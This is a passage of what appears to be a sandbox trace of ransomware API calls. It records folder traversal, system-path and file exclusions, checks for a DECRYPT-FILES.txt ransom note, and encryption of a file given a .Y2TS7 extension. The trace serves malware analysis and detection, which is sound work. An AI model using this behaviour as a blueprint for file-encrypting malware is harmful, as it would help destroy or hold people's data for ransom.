HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.846] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\All Users") returned 0x0 [0180.846] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.846] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.846] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.846] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="AhnLab") returned 0x0 [0180.846] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.846] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\") returned 66 [0180.846] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.846] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\\\0a16c9.tmp") returned 77 [0180.846] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.847] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\") returned 66 [0180.847] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.847] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\\\DECRYPT-FILES.txt") returned 84 [0180.847] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.847] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\") returned 66 [0180.847] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\*" [0180.847] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43bcc750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeeeb90a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeeb90a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.848] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.848] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43bcc750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeeeb90a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeeb90a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.848] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.848] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.848] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeeb90a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeeb90a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeeb90a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.848] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.848] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.848] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.848] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.848] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.848] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.848] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.848] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.848] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.848] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.848] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.848] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.848] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.848] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.848] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.848] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\") returned 66 [0180.848] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.848] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\" [0180.848] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\0a16c9.tmp" [0180.848] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.849] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.849] CloseHandle (hObject=0x0) returned 0 [0180.849] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.849] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaf80ea0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaf80ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.849] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.849] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaf80ea0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaf80ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.849] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.849] CloseHandle (hObject=0x26c) returned 1 [0180.849] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaaff32c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaff32c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher Building Blocks", cAlternateFileName="PUBLIS~2")) returned 1 [0180.849] lstrcmpW (lpString1="Publisher Building Blocks", lpString2=".") returned 1 [0180.849] lstrcmpW (lpString1="Publisher Building Blocks", lpString2="..") returned 1 [0180.849] lstrcatW (in: lpString1="Publisher Building Blocks", lpString2="\\" | out: lpString1="Publisher Building Blocks\\") returned="Publisher Building Blocks\\" [0180.850] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Publisher Building Blocks\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\" [0180.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\Program Files") returned 0x0 [0180.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch=":\\Windows") returned 0x0 [0180.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\Games\\") returned 0x0 [0180.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\All Users") returned 0x0 [0180.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="AhnLab") returned 0x0 [0180.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.850] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned 82 [0180.850] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.850] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\\\0a16c9.tmp") returned 93 [0180.850] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.852] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned 82 [0180.853] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.853] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\\\DECRYPT-FILES.txt") returned 100 [0180.853] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.853] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned 82 [0180.853] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*" [0180.853] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeeeb90a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeeb90a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.854] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.854] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeeeb90a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeeb90a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.854] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.854] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.854] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeeb90a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeeb90a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeeb90a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.854] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.854] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.854] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.854] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.854] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.854] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned 82 [0180.854] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.854] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\" [0180.854] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\0a16c9.tmp" [0180.854] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.855] CloseHandle (hObject=0x0) returned 0 [0180.855] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.855] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4bb4c1b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaafa7000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ContentStore.xml.Y2TS7", cAlternateFileName="CONTEN~1.Y2T")) returned 1 [0180.855] lstrcmpiW (lpString1="ContentStore.xml.Y2TS7", lpString2="DECRYPT-FILES.txt") returned -1 [0180.855] lstrcmpiW (lpString1="ContentStore.xml.Y2TS7", lpString2="autorun.inf") returned 1 [0180.855] lstrcmpiW (lpString1="ContentStore.xml.Y2TS7", lpString2="boot.ini") returned 1 [0180.855] lstrcmpiW (lpString1="ContentStore.xml.Y2TS7", lpString2="desktop.ini") returned -1 [0180.855] lstrcmpiW (lpString1="ContentStore.xml.Y2TS7", lpString2="ntuser.dat") returned -1 [0180.855] lstrcmpiW (lpString1="ContentStore.xml.Y2TS7", lpString2="iconcache.db") returned -1 [0180.855] lstrcmpiW (lpString1="ContentStore.xml.Y2TS7", lpString2="bootsect.bak") returned 1 [0180.855] lstrcmpiW (lpString1="ContentStore.xml.Y2TS7", lpString2="ntuser.dat.log") returned -1 [0180.855] lstrcmpiW (lpString1="ContentStore.xml.Y2TS7", lpString2="thumbs.db") returned -1 [0180.855] lstrcmpiW (lpString1="ContentStore.xml.Y2TS7", lpString2="Bootfont.bin") returned 1 [0180.855] lstrlenW (lpString="ContentStore.xml.Y2TS7") returned 22 [0180.855] lstrcmpiW (lpString1="Y2TS7", lpString2="lnk") returned 1 [0180.855] lstrcmpiW (lpString1="Y2TS7", lpString2="exe") returned 1 [0180.855] lstrcmpiW (lpString1="Y2TS7", lpString2="sys") returned 1 [0180.855] lstrcmpiW (lpString1="Y2TS7", lpString2="dll") returned 1 [0180.855] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned 82 [0180.855] lstrlenW (lpString="ContentStore.xml.Y2TS7") returned 22 [0180.855] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\" [0180.855] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpString2="ContentStore.xml.Y2TS7" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Y2TS7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Y2TS7" [0180.855] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.856] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Y2TS7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml.y2ts7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0180.856] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=432) returned 1 [0180.856] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0180.856] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.856] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0180.856] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0180.856] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.857] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fdc98*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fdc98*=0x100) returned 1 [0180.857] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0180.857] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.858] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.858] CloseHandle (hObject=0x278) returned 1 [0180.858] SetFilePointerEx (in: hFile=0x274, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.858] WriteFile (in: hFile=0x274, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fdcb8, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fdcb8*=0x108, lpOverlapped=0x0) returned 1 [0180.859] CloseHandle (hObject=0x0) returned 0 [0180.859] CloseHandle (hObject=0x274) returned 1 [0180.859] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.859] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.861] GetTickCount () returned 0x1134a79 [0180.861] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.861] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0180.861] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0180.861] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.861] lstrlenA (lpString="kernel32.dll") returned 12 [0180.862] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0180.862] lstrcpyA (in: lpString1=0x36fd0ac, 